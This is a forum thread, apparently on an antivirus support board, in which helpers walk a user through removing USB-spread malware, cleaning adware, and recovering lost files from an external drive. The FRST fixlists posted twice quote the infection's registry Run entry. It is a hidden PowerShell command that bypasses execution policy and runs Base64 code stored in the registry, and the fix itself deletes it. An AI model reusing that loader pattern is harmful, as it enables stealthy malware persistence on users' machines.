Hello

My pc (C, D units) and my external HD drive (H, I units) have been infected by this malware from a USB stick and Avast emits intermittent alerts without however eliminating threats. Here logs attached, unfortunately something breaks aswMBR before complete scan, so I informed the Windows report instead of aswMBR.

Thanks to anyone who can help. ;D

Looks like you got two for the price of one here

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM\...\Policies\Explorer\Run: [127107158] => C:\ProgramData\msutbdt.exe [101586944 2015-06-15] () HKU\S-1-5-21-2771414842-448429842-2593070003-1000\...\Run: [{3391B05F-0744-44BB-BC93-C673423EAA57}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ILCaYqhsjqyxl').tRqm))); C:\Users\Todos os Usuários\msutbdt.exe 2015-07-15 10:37 - 2015-06-15 18:42 - 101586944 ___SH () C:\ProgramData\msutbdt.exe DeleteKey: HKCU\Software\Classes\ILCaYqhsjqyxl RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please download AdwCleaner by Xplode onto your desktop.

[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.

hehe… I never had luck with malware sales.

Question: I need to be with my external HD drive connected to perform these steps?

Tnkx for attention, essexboy

Question: I need to be with my external HD drive connected to perform these steps?

Hi, Pondus.

Steps were made and logs sended without the removable units is connected.

Now you wait for Essexboy … it may take some hours before he is back online

Thumb Up

Could you confirm all alerts have now ceased

Wow, great job essexboy!

No alerts in the last 20 minutes and the PC appears faster than before infection.

But my removable drive is no more recognized.

Did you scan it with MCShield ? Is it a USB stick

I tried, but the computer no more recognizes the external HD, so there is no scanning.

A Samsung 350GB Sata in external case 3.5, USB 2.0.

What error do you get when you plug in the USB drive

Ok, suddenly the system recognized the external hd and McShield completed the log. I honestly do not know what I did, but it is working. :o

Unfortunately, the external hd still continues with strange behavior (see attached pictures), can not be ejected, and apparently have lost 15GB of content. Please continue helping me, as if this loss is true, I will have many professional and academic problems.

The other issue, of intermittent warnings about differentia / disorderstatus was 100% settled, except that now the computer always starts with a minimized program called WindowsPowerShell from System32. What is this?

Could you run a fresh FRST scan for me please

With MCShield did you set it up as follows

Download MCShield to your desktop and install
It will initially run a scan and show the result as a toaster by the system clock
Then in the control centre select scanner and tick unhide items on flash drives

https://dl.dropbox.com/u/73555776/mcshield%20unhide.JPG

Plug in the drive and McShield will start a scan

Then get the log which will be located under the logs tab on the main page

And post that

Here’s MCShield log.

Here’s FRST log.

Intriguing the powershell entry returned … Firefox has a multitude of unsigned extensions and I do mean a lot, it may be worth uninstalling and reinstalling FF to male it run smoother

Have the hidden files returned on your external drive ?

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKU\S-1-5-21-2771414842-448429842-2593070003-1000\...\Run: [{3391B05F-0744-44BB-BC93-C673423EAA57}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ILCaYqhsjqyxl').tRqm))); 2015-07-10 01:52 - 2015-07-10 01:52 - 0000000 _____ () C:\Users\user\AppData\Local\{C5CF6476-8F6E-4147-9AEA-8FF714308F1A} DeleteKey: HKCU\Software\Classes\ILCaYqhsjqyxl RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

I am a publicist and unfortunately these extensions are part of my work, so much so that did not problems in these two years when I have them, prior course of pendrive infection today.

And no, the external drive did not return to normal behavior, what can I do more?

Has the powershell popup now disappeared ?

Have you a backup or image of the drive ?

If not you may be able to use one of the following

http://i.imgur.com/y3MMIrs.png
Previous Versions

[*]Right-click the file/folder and click Properties.
[*]Click Previous Versions.
[*]This tab will list all copies of the file and the date they were backed up.
[*]To restore a particular version of the file, click Copy and select the directory you wish to restore the file to.
[*]If you wish to restore the selected file and replace the existing one, click Restore
[*]If you wish to view the contents of the file before restoring, click Open.

http://i.imgur.com/MzmiIl9.gif
ShadowExplorer

[*]Please download http://www.shadowexplorer.com/uploads/ShadowExplorer-0.9-portable.zip and save the file to your Desktop
[*]Right-Click ShadowExplorer-0.9-portable.zip and click Extract All. Select your Desktop and click Extract
[*]Right-Click ShadowExplorer.exe and select
http://i.imgur.com/AVOiBNU.jpg
Run as administrator to run the programme.
[*]You will see a drop-down menu with the shadow copies of all partitions and disks present.
[*]Click C:\ from the drop-down menu.
[*]To the right, pick a date prior to the infection from the drop-down menu.
[*]To restore a whole folder, right-click on your desired folder and click Export. You will then be prompted as to where you would like to restore the contents of the folder to.

http://i.imgur.com/J8xQM97.png
File Recovery Software
File Recovery Software may be able to recover the original file deleted by the infection. Please bear in mind, the more you use the machine after the files are encrypted, the harder it will be for the recovery software to recover your files.

[]
http://i.imgur.com/fSA1TL4.png
R-Studio
[]
http://i.imgur.com/C08PZmH.png
Photorec
[*]
http://i.imgur.com/uc6sByo.png
Recuva

No, boy, unfortunately I was organizing the files to backup and this is my only copy.

I will follow your suggestions and post the results here shortly, but first I have some questions:

1 - The missing folder could be recovered with the prompt C:>attrib -h -r -s /s /d h:*.* ?

2 - Is it possible suggest to Avast more informative popup warnings, such as DO NOT CONNECT REMOVABLE DEVICES UNTIL ATTACKS BEEN SOLVED? As it is, we have the impression that the antivirus just want to inform you that it has blocked an attack, omitting it left spread up a whole infection.